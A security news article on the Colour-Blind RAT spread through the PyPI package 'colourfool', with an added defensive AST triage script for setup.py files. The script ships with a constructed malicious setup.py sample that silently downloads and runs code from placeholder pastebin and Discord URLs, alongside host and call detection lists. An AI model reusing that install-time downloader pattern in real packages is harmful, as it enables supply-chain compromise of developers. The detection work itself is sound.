Colour-Blind RAT spreads through compromised PyPI packages

March 17, 2023

A malicious PyPI package is currently spreading a fully featured information stealer and remote access trojan (RAT) called Colour-Blind. PyPI has become a frequent and easy target for attackers because anyone can publish a package without prior review, code testing, or vetting of the publisher.

According to the reports, the RAT is delivered through a package named 'colourfool'. The package consists of a single file, setup[.]py, which the malware authors wrote to download a second-stage file from pastebin[.]com.

The setup[.]py script then tries to run the downloaded file without drawing the target's attention: during installation it redirects all output to the null device. If the pastebin[.]com download fails, the script falls back to a hardcoded Discord URL.

The first stage copies the downloaded file into the same directory as the Python interpreter (python[.]exe) and executes it from there. The copy also serves as a marker: the script checks for it so that an already-compromised host is not reinfected.
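The install-time behaviour described above (a setup[.]py that fetches a file from a paste or chat-hosting site, drops it beside the interpreter, runs it with output sent to the null device) is visible in the source before `pip install` ever executes it. The following static triage script is an added example written for this article, not code from the researchers or from the 'colourfool' package. It walks the AST of a setup.py and flags the constructs that correspond to each described step. The host list, the call and attribute tables, and the function names are assumptions; the sample setup.py strings are constructed here to mimic the described pattern and use placeholder URLs, not the real ones.

```python
import ast

# Download, fallback and exfiltration hosts named in the article (illustrative list).
SUSPICIOUS_HOSTS = ("pastebin.com", "discordapp.com", "discord.com", "transfer.sh")

# Dotted call names that fetch or execute things while `pip install` runs (assumed table).
FLAGGED_CALLS = {
    "urlopen": "network fetch at install time",
    "urlretrieve": "network fetch at install time",
    "requests.get": "network fetch at install time",
    "requests.post": "network fetch at install time",
    "exec": "dynamic code execution",
    "eval": "dynamic code execution",
    "os.system": "process spawned at install time",
    "os.startfile": "process spawned at install time",
    "subprocess.Popen": "process spawned at install time",
    "subprocess.run": "process spawned at install time",
    "subprocess.call": "process spawned at install time",
    "subprocess.check_output": "process spawned at install time",
    "shutil.copy": "file copy (payload drop?)",
    "shutil.copyfile": "file copy (payload drop?)",
}

# Attribute references matching the behaviours the article describes (assumed table).
FLAGGED_ATTRS = {
    "subprocess.DEVNULL": "output redirected to the null device",
    "os.devnull": "output redirected to the null device",
    "sys.executable": "interpreter path used (drop beside python.exe?)",
}

def _dotted(node):
    """Rebuild 'a.b.c' from a Name/Attribute chain; None for anything else (e.g. a call result)."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted(node.value)
        return f"{base}.{node.attr}" if base else None
    return None

def _match(name, table):
    """Exact or suffix match so 'urllib.request.urlopen' hits the 'urlopen' key."""
    if not name:
        return None
    for key, reason in table.items():
        if name == key or name.endswith("." + key):
            return reason
    return None

def triage_setup_py(source):
    """Return sorted, de-duplicated (line, reason) findings for one setup.py source text."""
    tree = ast.parse(source)
    findings = set()
    # Module-level control flow runs during installation, unlike code inside setup() metadata.
    for stmt in tree.body:
        if isinstance(stmt, (ast.If, ast.Try, ast.For, ast.While)):
            findings.add((stmt.lineno, "module-level control flow runs at install time"))
    for node in ast.walk(tree):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            for host in SUSPICIOUS_HOSTS:
                if host in node.value:
                    findings.add((node.lineno, f"reference to {host}"))
        elif isinstance(node, ast.Attribute):
            reason = _match(_dotted(node), FLAGGED_ATTRS)
            if reason:
                findings.add((node.lineno, reason))
        elif isinstance(node, ast.Call):
            reason = _match(_dotted(node.func), FLAGGED_CALLS)
            if reason:
                findings.add((node.lineno, reason))
    return sorted(findings)

# Constructed sample modelled on the described first stage; URLs are placeholders, not real ones.
SAMPLE_SETUP_PY = '''\
import os, sys, shutil, subprocess
from urllib.request import urlopen
from setuptools import setup

PRIMARY = "https://pastebin.com/raw/EXAMPLE"
FALLBACK = "https://cdn.discordapp.com/attachments/EXAMPLE"

def fetch():
    try:
        return urlopen(PRIMARY).read()
    except Exception:
        return urlopen(FALLBACK).read()

target = os.path.join(os.path.dirname(sys.executable), "helper.py")
if not os.path.exists(target):
    with open(target, "wb") as f:
        f.write(fetch())
    subprocess.Popen([sys.executable, target], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)

setup(name="example-pkg", version="0.0.1")
'''

# Constructed benign setup.py for comparison.
CLEAN_SETUP_PY = '''\
from setuptools import setup, find_packages
setup(name="benign", version="1.0", packages=find_packages())
'''

if __name__ == "__main__":
    for line, reason in triage_setup_py(SAMPLE_SETUP_PY):
        print(f"line {line}: {reason}")
    print("clean sample:", triage_setup_py(CLEAN_SETUP_PY))
```

Run it against the `setup.py` of an sdist before installing (`pip download --no-binary :all: <pkg>` and unpack). The checks are deliberately simple: a module-level `if`/`try` is the tell that work happens at install time rather than inside `setup()` metadata, and the host and `sys.executable` matches map directly onto the steps reported above. Renamed imports or string obfuscation will evade suffix matching, so treat an empty result as "nothing obvious", not as a clean bill.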

The payload of Colour-Blind RAT includes numerous lines of code.

The installed Colour-Blind payload is a Python script considerably larger than the first-stage script, running to more than 2,000 lines of code. It includes modules for logging keystrokes, executing commands, capturing the webcam, and stealing passwords, cookies, and cryptocurrency wallet data.

Researchers also noticed a module named 'disbale_antivirus' (the misspelling is the malware author's), which is intended to disable Microsoft Defender.

The authors also took steps to hinder analysis: the code is obfuscated with variable names that are not human-readable, and it checks whether it is running in a sandbox or virtual machine before proceeding.

The RAT exfiltrates data through transfer[.]sh, a legitimate file-hosting service. For persistence it uses a Visual Basic script that writes a batch file which launches the malware when Windows starts.

Malicious packages have flooded PyPI in recent months. Researchers recently uncovered a wave of activity in which numerous malicious packages were uploaded to the repository to target software developers.

Users should therefore stay alert when downloading or installing packages from PyPI, since malware developers have been targeting the platform heavily of late.
